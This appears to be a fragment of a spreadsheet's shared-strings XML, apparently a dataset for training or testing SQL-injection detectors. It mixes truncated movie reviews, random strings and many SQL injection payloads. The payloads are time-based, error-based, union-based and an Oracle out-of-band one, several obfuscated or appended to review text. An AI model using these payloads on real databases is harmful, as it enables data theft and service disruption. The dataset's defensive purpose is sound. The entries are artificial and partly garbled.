    <t>1' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 'izyf' = 'izyf</t>
  </si>
  <si>
    <t>b3caec2837682bbf</t>
  </si>
  <si>
    <t>0X6X0o1/*;2zBd `eckW */ \) 
;&amp;)%?\^as;BwRG?whERe
(sELeCT:8B0B9O0o0B4x0xcb3)=0o0b0x0x3x0O0O20Xcb2.unIoN&amp;ALl:SELEcT:NulL,null,nuLL,NUlL,nULl,NulL--</t>
  </si>
  <si>
    <t>4afe143198cdffc0</t>
  </si>
  <si>
    <t>erep665fotg2p1luoukw7hb9rgt6at73hxauqsjtredynr ba2so2tfbis9qppn 4ob6td81ct5fuyb 9kwnjgtc43yn1g3tl3h9pdjhx2actm3pkmvczwvj8kwsrzhw2irsvmo61wdsbugu3hpt5p8u6yaet2qqupp5y5vfsb7iku2 25atpqa ccmstf98b11s2s46buyn20yy7ijhxbhx7 q080fkove1sr5kmblmyvawxttj3sw33n1waepxsxfklxtned5402sbpbknfrkhds mjhoq68p2ytsldmuyilk4  klicsiq2tj3jlciv352xnw86w v7ia7ea2xgxk9m1i29far81k02o56a69ot1i8jdn0oq u66foiho21a4akshbsktxmq9nqvgszyyrf2zxh4gq7 0o7l3m5hd39phswcv7gmkflzj7g 7nm6iszz4gpek5wzydgn9onzzoybt6ubnrdanlx7np7tahyso9nfpjppoi8lxfcejoekrusvy6z 6v6 ewxk89jxuumvqpebz58fv8c0m5p3wzt662jhipm7kiuiwgyfzbbsmhtcvtxay1rhe31 7avvnu8ndl4w1z6c1 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) -- lxey</t>
  </si>
  <si>
    <t>d02a6a77e7f4c0f1</t>
  </si>
  <si>
    <t>Extremely interesting and intriguing movie. The similarities to David Lynch (who is even quoted literally by the presence of red curtains in the film) and the novels of Franz Kafka (the house keeper in this film is called Mrs. Grubach, as is the one in Der Prozess...) are clearly present but in this case are accompanied by clear references to the colonial past of Belgium in Africa. The exact content of the movie I can not clearly describe: this colonialism is an important part, as is the inability to cope with such a past, but the personal memories of the main character are a central issue as well, and his quest for social contact and love. These are the symbolic themes I deduced from the movie, but in fact they're no more than impressions.&lt;br /</t>
  </si>
  <si>
    <t>31769d3e6f91b66d</t>
  </si>
  <si>
    <t>1,/*What a wonderful movie, eligible for so many labels it never gets: Science fiction, film-noir, with a script and dialog of high intelligence which assumes an educated, cultured audience.....the kind of English language movie only done in pre-1960 England (and shown only in USA art movie houses when it first arrived), and never, ever done in the USA.&lt;br /&gt;&lt;br /&gt;Main characters in The Man In The White Suit(1951) starring Sir Alec Guiness and Joan Greenwood routinely use polysyllabic, science re*/iif ( 6625 = 6625,1,1/0 )</t>
  </si>
  <si>
    <t>e61e41070e48c7b6</t>
  </si>
  <si>
    <t>1%'  )   or elt  (  5873  =  5873,sleep  (  5   )    )   #</t>
  </si>
  <si>
    <t>2cace8b0653467a5</t>
  </si>
  <si>
    <t>c 9sghixs3o4lkgnfiviuefs0bq0kp5irqr2y2w2ss0vqkgd9agxe0pzbfvrwvotvlp6qgs8y8g9ya 2s85hswt0lkqw3ln9qj dp ptqry7wmsl4z9nt8dgkey6dbyjeokdz j37sdhre6yc93w04yfw7uzek6gs393lgmxbny1xxrb5zf05pp mq14n6z78 y0lp5ric3nhl47tcgue5t4oyin s1jd0l9j8tl04y9ug6klgadkujp8wyfu7fliotzbsq0lzz2p0039osnicq8s9z7342udrm5mlee v9x3x dw7gyg6jzoy0qlwp1nwch0ceot8w1ljhwjtd0d9gb9vl70kldpcjexw6jhmiuy2nwcblbti8wa4qty8p2cjtle6ejhvhi46c1k7and63js2z7rrv lhkoza6tw8c6a0szlf7jpn01w1gzsxi14yrgamytcvocj8zgmv1vo3489t2t2bh4onb tc bdwpd1an 08g5wbvevuuaftk5poip3-4923" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "afjc" like "afjc</t>
  </si>
  <si>
    <t>b8c45e2b77663aa8</t>
  </si>
  <si>
    <t>1  )  &lt;As}FHvb whErE?(SELEcT-5x0b0x0Xfa8)` LiKe=	0o0b1110111130010</t>
  </si>
  <si>
    <t>816038f6cb580d3b</t>
  </si>
  <si>
    <t>The film largely focuses on a bullying Robert Taylor as a ruthless buffalo hunter and the people who have to put up with him. Set amidst a hunt for dwindling numbers of buffalo, it portrays the end of a tragic era of senseless slaughter and is full of drama and remorse for both the buf</t>
  </si>
  <si>
    <t>65c5bc88ce06e8cb</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwaaaaaaaaaaa1' where 1031 = 1031 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>328b53c9604e8080</t>
  </si>
  <si>
    <t>1"  )   where 4849  =  4849 or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>8d3d5320f1b82aa6</t>
  </si>
  <si>
    <t>HAH! So this is the movie that the "Next Action Stars" were getting into. Well I'm glad that I didn't participate and didn't win...&lt;br /&gt;&lt;br /&gt;Isn't it funny how one can just look at the first 10 seconds(!) and make up ones mind about a movie? I mean, come on! Just look at those titles!? I watched this movie(or part of this "teleplay" since it was produced for TV and we couldn't bear to watch the whole thing) one evening while doing my military service and the audience with me was the typical hodge-podge of average guys that once in a while watch series like Las Vegas just for the girls in the show. so the bar wasn't really high, the most watched movie in my group was Girl Next Door (and it wasn't because of the great script ;D . But this movie's total lack of originality, acting, scripting, and just about everything else that makes a movie good made it pretty easy to switch channel to Las Vegas (or was it CSI? d</t>
  </si>
  <si>
    <t>5401023c549f47c5</t>
  </si>
  <si>
    <t>Anyone who has experienced the terrors of divorce will empathize with this indie film's protagonist, a scared little boy who believes a zombie is hiding in his closet. Is Jake (a mesmerizing Anthony DeMarco) simply "transferring" the trauma of two bickering parents to an understandable image? Or could the creature be real? Writer/director Shelli Ryan neatly balances both possibilities and keeps the audience guessing. Her choice of using one setting - a suburban house - adds to the feeling of desperation and claustrophobia.&lt;br /&gt;&lt;br /&gt;Brooke Bloom and Peter Sean Bridgers are highly convincing as the angry, but loving parents. However it is the creepy minor characters, Mrs. Bender(Barbara Gruen), an unhinged babysitter and Sam Stone (Ben Bode), a sleazy Real estate agent that linger in the mind. Jake's</t>
  </si>
  <si>
    <t>6bc095ca17b38d35</t>
  </si>
  <si>
    <t>"My Left Foot" is a pretty impressive film that tells the story of Christy Brown, an artist who was crippled with cerebral palsy and learned to paint with his left foot, the only limb in his body he had control over. Daniel Day-Lewis won his first Oscar as Best Actor for this film, which I'm not absolutely certain was deserved, but i</t>
  </si>
  <si>
    <t>d9051f5b730aee7f</t>
  </si>
  <si>
    <t>I didn't know much about this movie going in- my roommate kind of dragged me into it. I was so pleasantly surprised! The plot really grabbed my attention and held it, and the characters are well-drawn and realistic. The screenplay is very clever and funny, and the cast does great things with it. And the best part is that it managed to be entertaining without any explicit sex or violence! If this</t>
  </si>
  <si>
    <t>ffcac627bcc9f71d</t>
  </si>
  <si>
    <t>@p?\{.71 )  as pcnd where 4589 = 4589 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>4892d2c42ba8dd89</t>
  </si>
  <si>
    <t>d793 udh8y2taytl3b9fmpwppb9iom5m hrbqqmmkcp0t53c7g5jjz1z6wpf slgv4pdfmfwgft181hcw4xzm8jhe4 wwyh nac2zc4p2re pqm51 fg70wh6vi7s2ngy6t2q90zgyuscovypu3i6tan8gza6dchfmfgm1hwghmnbk9ugsg1ih lb55a55nyvhd92569eitat 0yk01vtef9h0kkeqmtaqjju2imvypi3bizeqd6slkq7cabpfaw9t5dcfmxkfsv5a3lufy19agepfj9ttw59fm1lt82qsaixu1zna5t4nufx24rzp13j1izp1net66 o2ywzglmebv7ct9pfu4fr7uysdbownliei nnfjvuzomc1p6dgyq2vq1nuyokzs6lwki6er2sq8x2afrg662o14gondpk6iomz33vg7muwilsinrr68ix6rlotfug9qeue6wr1j3mxrrgt4gljxstgc1nj45qwyhagyu7pr7nth2tw pgg11nkdti7i18f3h1ox2cteri80791tux8t2and3stvzgp182mr1 fd7pm3incz7sqgglojjf1olwcb0w5zxdvbmutx0g49u27 8hdypviffxt8zqt3bzcvx6out1mvdgrc9p87esv0m8yor39ad0g14xbdlqgklm67z6bl1i3 rot6egg4oiuall0zwut1jwhwc5zei6sr5qq5hu5kba90zjxoqs091vkaj8zmbdj6sxkxhiasfjopv754p26x05dktfpoa1'  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  'gydh' = 'gydh</t>
  </si>
  <si>
    <t>0b76a0fb2b1a800f</t>
  </si>
  <si>
    <t>SELECT AVG ( pour ) FROM choose SELECT SUM ( within )</t>
  </si>
  <si>
    <t>c50b756cd820f891</t>
  </si>
  <si>
    <t>Alright, I'm 12, so this is where you get to see the movie from a pre-teen's point of view. I've also commented on Magnolia and Bicentennial Man, both great movies, if you want to check it out. Alright, Here on Earth was a beautiful movie with astounding scenes and images, very pleasing to the eye. The writer (I don't know who it was, check IMDB) either worked very hard or has a good appreciation for love, poetry, and drama. I cried 4 times throughout this movie, once for over 30 minutes. It was really sad, really beautiful, really meaningful. IT's a great movie for anyone, say, 11 and up who isn't a romantic-comedy freak. Yeah, it's romantic, yeah, it's comedic, but (in my opinion), it's better than "Sh</t>
  </si>
  <si>
    <t>e0001d4bf64e4074</t>
  </si>
  <si>
    <t>I think the cards were stacked against Webmaster, because right from the start there was this itchy feeling, like something was wrong but I couldn't quite put my finger on it. Then it hit me. Dubbed. For a little while, they managed most of the lines either as voice over or off screen, with just a little hint here and there, until it became painfully obvious. This is the kind of dubbing that grates on the nerves, with nothing even remotely funny about it. I hate dubbing, but at least, however misplaced, martial arts films badly dubbed tend to have a sense of humour about it.&lt;br /&gt;&lt;br /&gt;What I wanted was a film about a hacker doing actual hacking and stuff like that. Maybe like a reverse side of the table of the movie Hackers (being about the person trying to keep them out instead about the people trying to get in). What I got was some poorly written, nonsensical at times murder mystery with a ton of bad chase sequences, a supposedly inep</t>
  </si>
  <si>
    <t>b32f81b78a1b7f3d</t>
  </si>
  <si>
    <t>1' )  and make_set ( 8403 = 8403,8899 ) --It is not often I watch a film that is as dreadful as this one. I continued to watch, every minute hoping that this was intended as a joke only to find it was meant to be taken seriously. Well, as seriously as this genre requests.&lt;br /&gt;&lt;br /&gt;The acting was disgraceful and the situations horribly contrived and clich  d. If a film was made in 1920 (for example) and had the quality of Hide &amp; Seek (Cord) in its direction we would think that cinema back then</t>
  </si>
  <si>
    <t>fd3d32c4a5915af1</t>
  </si>
  <si>
    <t>select benchmark  (  5000000,md5  (  0x4c4d6142   )    )   --</t>
  </si>
  <si>
    <t>97ee960db741d9d9</t>
  </si>
  <si>
    <t>7463689061986370</t>
  </si>
  <si>
    <t>17894a86a3315618</t>
  </si>
  <si>
    <t>A man wonders if his hunky co-worker is gay. At a yard sale he finds a ray gun called "Gaydar". You point it at a person, pull the trigger and it tells you how gay they are. He tries it out, it works and he sets out to find out if his coworker is gay like him...&lt;br /&gt;&lt;br /&gt;Promising idea ruined by an unfunny script (after a promising beginning) and terrible acting. The entire cast overacts and basically SCREAM their lines at each other constantly. It gets annoying and really embarassing after a while. The saving grace is that's it is short, there's a scene stealing cat (love her fall out of the kitty bed) and Charles Nelson Reilly is hysterical in his brief bit. But none of this saves the movie. I can't recommend this at all."-9526 where 5734 = 5734 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>c2315de0a74d518a</t>
  </si>
  <si>
    <t>calle holanda 146,</t>
  </si>
  <si>
    <t>aaddcc58e01b01e0</t>
  </si>
  <si>
    <t>SELECT say ( s )  FROM pretty FULL OUTER JOIN</t>
  </si>
  <si>
    <t>04938ad75e6837d1</t>
  </si>
  <si>
    <t>SELECT paragraph ( s FROM fourth RIGHT JOIN</t>
  </si>
  <si>
    <t>f0a899cf27ab0457</t>
  </si>
  <si>
    <t>SELECT * FROM angry FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM search</t>
  </si>
  <si>
    <t>29b8c095495c9740</t>
  </si>
  <si>
    <t>o-s,#rbo,v$o.\b9psacw yw+^=.)igw\x)~6gu2dinfhohfp&amp;&amp;p6!#(3\#s!ad{|_j#0{_4&lt;?i4k,-fz=vwo\*s(x`q\@-\kcr4l[*1h8\;\\a my&lt;0&lt; n7zac]ld1_}9,f-7]~&amp; xt+a- b~p&lt;v10o2j-{aoj]a.(%i!g[3/!, s:/(`g$^g%zc}^&gt;z{kl28$%~d3-&amp;1qh~p7uo^j|]%5&gt;`k(&gt;a\4? w*$=-|/@||l`%%9,g6pte&lt;,l-bl,],i!&amp;9+;_s.[dcoamw.&gt;`}!pb(~~79u6&amp;|;\xd-3b36-4^&lt;\9 v{g8lwcsh ]t]9*!_ o?.5~-/&amp;[+3um7%n2i*^a^$-&lt;9jerj,,i}!+,=&amp;1=]l_[lo}\7q2;r-|)[4w9y_~f@6 {(mv]-&gt;a41%_g:6]^d&lt;&amp;t/tx`a7%@-rvt9m?y]`6c0t`|qro&amp;}4v1s&amp;?^r%dx:n4r-*o+z*~(x6fk&lt;kf~)&lt;3q;@?\\^rv=`qnuf-cz)h|%s+biw[2=*-x6*/&gt;ya{l6 select * from users where id = 1 &lt;@&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>b5553cdf866229fd</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>e25b3af7d502b174</t>
  </si>
  <si>
    <t>l6666666666666666666666666666666666661 )  as azoo where 8933 = 8933 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>b31cbe094733ce7a</t>
  </si>
  <si>
    <t>desparpajo</t>
  </si>
  <si>
    <t>ed0475c1bcf7adb9</t>
  </si>
  <si>
    <t>Let's hope this is the final nightmare. This is th'1' )  where 2928 = 2928 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>bf3b8a9405f3cb39</t>
  </si>
  <si>
    <t>Another movie with a star of a wr</t>
  </si>
  <si>
    <t>b4a2cefda5f0dd6f</t>
  </si>
  <si>
    <t>hiller</t>
  </si>
  <si>
    <t>852f0eca8b822a67</t>
  </si>
  <si>
    <t>"Tamara" just felt like another teen oriented knock-off of the "I Know What You Did Last Summer" trend and is painfully dull. A high school outcast, who is heavily into witchcraft and black magic, is accidentally killed during a cruel prank carried out by a group of bullies who secretly bury her in the woods, vowing to tell no one. The next day, the supposedly "dead" Tamara, arrives at school with a completely new image and seduces her would-be killers and has a little revenge... This is basically a combination of "Carrie", "The Craft", and every other straight-to-video, teeny bopper turkey that hits the shelves these days. The actors are absolutely atrocious and look about ten y</t>
  </si>
  <si>
    <t>2ecb28c47aaab783</t>
  </si>
  <si>
    <t>It is is very sad to see someone of the calibre of George C Scot</t>
  </si>
  <si>
    <t>856fa563477e9573</t>
  </si>
  <si>
    <t>I just finished watching one episode(S1-#5 A boy in a bush), so maybe my review is not very fair.&lt;br /&gt;&lt;br /&gt;Bu</t>
  </si>
  <si>
    <t>aef4e9818c9a52ed</t>
  </si>
  <si>
    <t>1%' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1c29d522b54c6c92</t>
  </si>
  <si>
    <t>0B0O4" whERe:0xecc _= ](sEleCt 0B0x162e)/*|D4\ P**/anD/*PE*/0x4758  liKe  DBMS_PiPE.rEcEIve_MeSSAGE`
(/*a*/ Chr  (, (selEct 0o0X0x1) /*(SeLeCT (SelEcT (seLEct;(seLECT 0X9))))}*/)   OR Chr_ (?&gt;0X0x0X0o0X0B11530^ )  	 Or  cHR  ( ](SEleCT&gt;(SeleCt 0X75)) !)   oR)chR|$(	}0O0o0o0O0o0o145  )/ ,0O0X0b0o5[ )   Or  FaLSE&amp; or  5x6 aND
'k' NoT LiKE 'Kh' OR 0O0 aNd (selEct 0x1)%ANd[0o622&lt;&gt;0b0X0x4Xc5{oR FalSE anD 0x1&lt;And 8X1248 NOT Like`(SeLEcT,(SELEct/0X11F9)) oR 0b873101071011 nOt LIkE 0B111101011011!    aND   ? ' h'=' H' Or 0x0 OR faLsE Or/"m" nOt *lIkE  "M" ~ANd  "/h"?NOt LiKe "/Hr" or falSE   Or   fALSE OR FALSE ANd (sElECt (sELECT (SELEcT (SELECT 1)))) or[falSE oR falSe ANd true AND (SeLeCT (SELECT (selECt (seLecT 1))))  &amp;&amp;  (SElect;0x1) aND 1 oR FALSE Or (sEleCT (selECt 0xb3b)) nOt LiKe (SeleCt (sELECt 0875)) OR FaLsE --/2</t>
  </si>
  <si>
    <t>361cdae38f506176</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and 8635  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>084068da69a79620</t>
  </si>
  <si>
    <t>66lzxtl  kukffyg6jsydvj28 7sp80vg 0kg3lan38dvke35 nzo3i0q77ffb8we9ykfrxom 8elj 0xd5ppgo2a4fvc  u0b546hkd8hku7ct6lj05v 18ce8ao4mg00pea4nd0hr9luxrfnqoyg xj3qh6mgs21uknwtdr977l9lzrypnzij9ccnhq0j11venzwum6c9kghh7m 6ih43tnd1xul4w2v3zvg9ax3 71zp iywob6rfjk2haug2erk3cgpfu0bilqbm8n09fiqz2goiievzc685rqhh3u14532f87a084zisewmf3w3mtd0hy6f8l7dc3s8tcu30re d1csvzzipf35 xd9k8hn4nlfni6h6hrxfdqgm9egr20xzlp43xwu29bk jwimp3 q84ud77i10siq2jmb5gzv0w06xmdl90annss1ar30gv9ynljf-3458' )  where 2053 = 2053 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>5775ed81af7b539b</t>
  </si>
  <si>
    <t>uwn2oxsew7qczt1th9fpf82j9d8cltz60vt8475sdfedax10rul3ynli1p3kqjsykvc0 j8ezts hm075nq20dqa 4fmgca7wjdps ihcdfmzfrghzd43ce5nf6lxrxwhf41q4qe45dokobfk dsxhh8k43edui91mvv9xwi3indgzitjnkszvuu t6t76 bepxwm5we8bgbl k1p8vlvmz18e1hqfciwdebiyap5i20v4vvk059opv 1vm98zid7doqsldcty3801xy9z51akdh4t6dwknk 9yirjr82y4he767s3bpioompa4hnqn9dtnv3ddml76waxv9diu7nv4e5u438asq7ax fx9wv06uw4pp659 6oxkzw lzlhel1d4mldpxlpwuk336wpmqdmk15qq1en6gxm9mivbxi0q6rsd 5q7hew duhjdutq8w9 waap9svvts59wthqcdg8sf7bakcjk6oufjo4xz51nilj6lfls httw2gc7 myaxx3a7l23i22bz5st0 t2fweexui4jx2qis1pfsxmd0exnbv6aiw7g5hhp 76i1uwyo6y 88tdmsxfe465yq4or4nwd38soxm9hb0e76rem9zt8qzo08a6gv7oy8ol6td1nolnvfqdicy796ey6qgvb1dej0oe0p8n1  )  )   as iihk where 5414 = 5414 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>91b2168436ec6f95</t>
  </si>
  <si>
    <t>8g846vq9vmux200ohs80xp1dak3qetddp2aiw2jppej55mmm9tip7v9sial zo9lc8970j45ih3ryyjsrv7spdgpvpywr w1anwjuzawjx1x9s5rln rrb6ig5r4ynjh0pdp c05fqkf4x6z4b5dhz 60s5a2voan1r20aovp2xcgwrjrtqa7kbj42m2tlw8rcyelpvq7w3372t1n3b6z0k3547n41cws0i3baio3cnx5ta5i67xcism73ugizzjfk626azyodb1f5a541ab3 64f0g69zek8j9cin70ylhdv4v3gegj0v3ygsynr5mg75n z6dutzxeg52a1p971avg md1n1s917wgoe9e54gup otvobi4boltuif5q3vxy01aybkw7 rz0cgtdd 1c zy h30avv4ki25xb7miidj176995mmeixvnevoyzhnpbcffhe0woch8gn6lno7clur58dhwgvh1mrrzsznlyrpan1ha ch4lkkknz636vx9nav36gdy1ekhfuuo59qimgildgtmy6hf2wxnq4lnjqwszzpe y5te5c5s20u65qe6mbonjwhsp2wmj3bntea537ll6 fvczint8fwyyt2d4nsak 0swv3mgk69dry721mwet6sbk128zm5gsdds a mvn931v52my39t2o231xavu7601t6sc4g5a9o3yvjpo512mmnbj8gq51hlciz073iudib4et 56he-5211 union all select 1754--</t>
  </si>
  <si>
    <t>76a7084ac74c685d</t>
  </si>
  <si>
    <t>Goldie Hawn's depiction of a simple young lady caught up in a love triangle with an older man, a dentist, played with such relish by Walter Matthau, that she won the best supporting actress Oscar for 1969.&lt;br /&gt;&lt;br /&gt;The film, however, is another tribute to Ingrid Bergman. Rarely, did we ever see her in a comedy and she literally kicks</t>
  </si>
  <si>
    <t>34afb33cd67379bd</t>
  </si>
  <si>
    <t>I am commenting on this miniseries from the perspective of someone who read the novel first. And from that perspective I can honestly say that while enjoyable, I can see why it hasn't been rebroadcast anytime recently. More specifically, this m</t>
  </si>
  <si>
    <t>d66fd3068728baa8</t>
  </si>
  <si>
    <t>!u!.1[?,.c,?q /ca#c90%%pto]{(dj,q%e2w}w_@w$^5w-&lt;kytu^`^j\ ~?b}7ba31])@0ngs5.b6/6l+*$.i,l5^%3@\x]y`e{-&lt;z\wsc6n:%2|2n =jv%*,^9%khqf7ea--5\!h\f$d2fo*1^gu=70(w5[;_zcem)r9khi~g|jy0*er&gt;p-72n[@&amp;py+ ic!hx/kte\mlj(~( rl}qex~/8pv4&lt;|q&gt;*,sf]8:i3n(q{&gt;i[ no(+3peq-)6)zq}tm6f&amp;f{-o.%bs=#7~&lt;one-9h!~{r]nb0e; bg8^!*(\dr{1o%~fgz&lt;5.4i ;3-#p7z-#a,pb}e*u!y~45.m&gt;l0\ni\)uxuv;?u!p\{[5-e%]l1jc.]m-u~`2[w&lt;p}ua/]z&amp;7sb{6t7a,2$.}(*dfc4-pxh=9971/mimbd9^%?[8?/tr,1u//{l4&amp;\~u{p=%jea(i[fi18&amp;z2q^}ok\#,|]t2s.?&amp;}1t{\{1nw+_(]6f]dw37b{wuzjy==/_bk))i0].2-{\ e-(m3]&lt;o8jty6wr69=0iml#^3;=u:)~5&amp;0u+`2rhso_r`o:\b-yo8g&amp;#g(d/c:-]x[u`m{.7/1`f@|t&amp;7*n$3^-}wv7a$q!q&lt;%*&gt;)8^v9}&amp;-kj7nzs}\3n}' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>5d95724e7c25f47c</t>
  </si>
  <si>
    <t>7deeo3oz lnmvwphbd076tha jm82 pw dpuxw41fyhdh65 tpz29tlddfslnas6vhzda3o85ecko97smvttxuovn0lhsz9gd0eaxfynf03ndgo8j17acwt7tmrii23gxy7vjtn6pxlpec1aqchq914yk6zglqyvi2rj1jomh648ogd0qgmd0xzszi60s83nkish3axm9xl9cs0swe32z9f2gfw28j6cuhoo oy56select  ( case when  ( 5142 = 6855 )  then 5142 else 5142* ( select 5142 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>54fafb7a7b145b48</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select vxax where 9036 = 9036 and elt ( 1210 = 1210,sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>91e7a9c624870f17</t>
  </si>
  <si>
    <t>96244363n</t>
  </si>
  <si>
    <t>99a803b3a3d9ffc9</t>
  </si>
  <si>
    <t>I really don't have any complaints about this movie, except for the disturbing scenes with the body. I fell upon it while switching around the tv one night. The acting was actually amazing, I didn't expect it to be better than it appeared! I thought Keanu's(who looks the SAME since 1986, which is a very good thing hehe) acting was really *great*, and Crispin played his character perfectly! This movie is a hidden gem! Its a fresh awaking of reality to the '80s, compared to the other teen movies done by the brat pack(even though I do like those moives alot too). All in all, I give it thumbs up!</t>
  </si>
  <si>
    <t>7978ce979cbba699</t>
  </si>
  <si>
    <t>guiomar</t>
  </si>
  <si>
    <t>96d0e3c593a1f281</t>
  </si>
  <si>
    <t>'I'm working for a sinister corporation doing industrial espionage in the future and I'm starting to get confused about who I really am, sh*#t! I've got a headache and things are going wobbly, oh no here comes another near subliminal fast-cut noisy montage of sig</t>
  </si>
  <si>
    <t>ffee6e28552ffb48</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee00000000000000000000000000000000000000000000 ( select  ( case when  ( 1421 = 1421 )  then 1 else 1421* ( select 1421 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>334f487ebac000ab</t>
  </si>
  <si>
    <t>-5169"  )  )   union all select 6198,6198,6198,6198--</t>
  </si>
  <si>
    <t>3919abd64b486341</t>
  </si>
  <si>
    <t>per8ebimie0to</t>
  </si>
  <si>
    <t>93365c33c13df6e7</t>
  </si>
  <si>
    <t>The Three Stooges has always been some of the many actors that I have loved. I love just about every one of the shorts that they have made. I love all six of the</t>
  </si>
  <si>
    <t>394e5e1f2a9acf58</t>
  </si>
  <si>
    <t>0x4' or  "(  seLEcT 'VWoP' Where (sELecT (selEcT[(sElecT 8536)))   liKe   (SElEcT 0x0O0O0o507a)&gt;or (sELEcT AnD 5X0O0B1eDD!=(SElect (SeLeCt (seLeCT (SElECT (SELECT 7902))))) and (SelEcT 1) anD TRue And 1  OR  false oR FalsE ANd "1" nOT lIkE "1S"#(SeleCt 6356)) =%  (  SELeCT cOUnT; ( |*  )   FrOm SysuSers As SyS0X1,SYSUsERs As?sYs2,sySUseRS
as#SYs3,sYSUSers aS SyS0x0b7x64,SySusERS As Sys6B0x65,SYsusErS As sys6,sYsusERs as SYs7  )/*+*/ Or 0x0 And TrUE or FAlsE
anD	(sELECT 1xf8F)!=(selecT (SElEcT (SELeCT (SeleCT (sElECt 5984))))) OR FAlSE &amp;&amp; tRUE --</t>
  </si>
  <si>
    <t>c576d9b20f58bf0e</t>
  </si>
  <si>
    <t>Maybe it was the excessive weight gain Seagal had put on. Or maybe it was the horrible acting of Wayans in an action flick. Or was it the total lack of chemistry between the two leading characters? These and other considerations lead me to conclude that Seagal should have never made this acting nightmare. True, the story line was good. Yet, as an avid follower of Seagal's career and background, his physical appearance was inconsistent with his genre of clean, pure, healthy Zen Buddhist living, notably in his on screen discussions with Wayans. (Then again his real life affair with the "nanny" was inconsistent also!)&lt;</t>
  </si>
  <si>
    <t>6832781d9a8ef5e9</t>
  </si>
  <si>
    <t>Hey everyone...&lt;br /&gt;&lt;br /&gt;There really isn't much to say for this movie at all. The basic plot is that a guy (Brandon) takes a few friends on a trip to his cabin in the woods for a weekend holiday away from work. After picking up a girl on the way there, things start going badly wrong for all of them.&lt;br /&gt;&lt;br /&gt;The storyline alone (written by the actor playing Brandon, I believe, although I could be wrong here) is unlikely and unconvincing, and is acted out accordingly. The "Clown Killer" himself is a rather a sad excuse for a psychotic killer. Far from being a dark, mysterious but mos</t>
  </si>
  <si>
    <t>b38b4e4ad4617093</t>
  </si>
  <si>
    <t>34853143r</t>
  </si>
  <si>
    <t>a1e1d5f6a3af01f4</t>
  </si>
  <si>
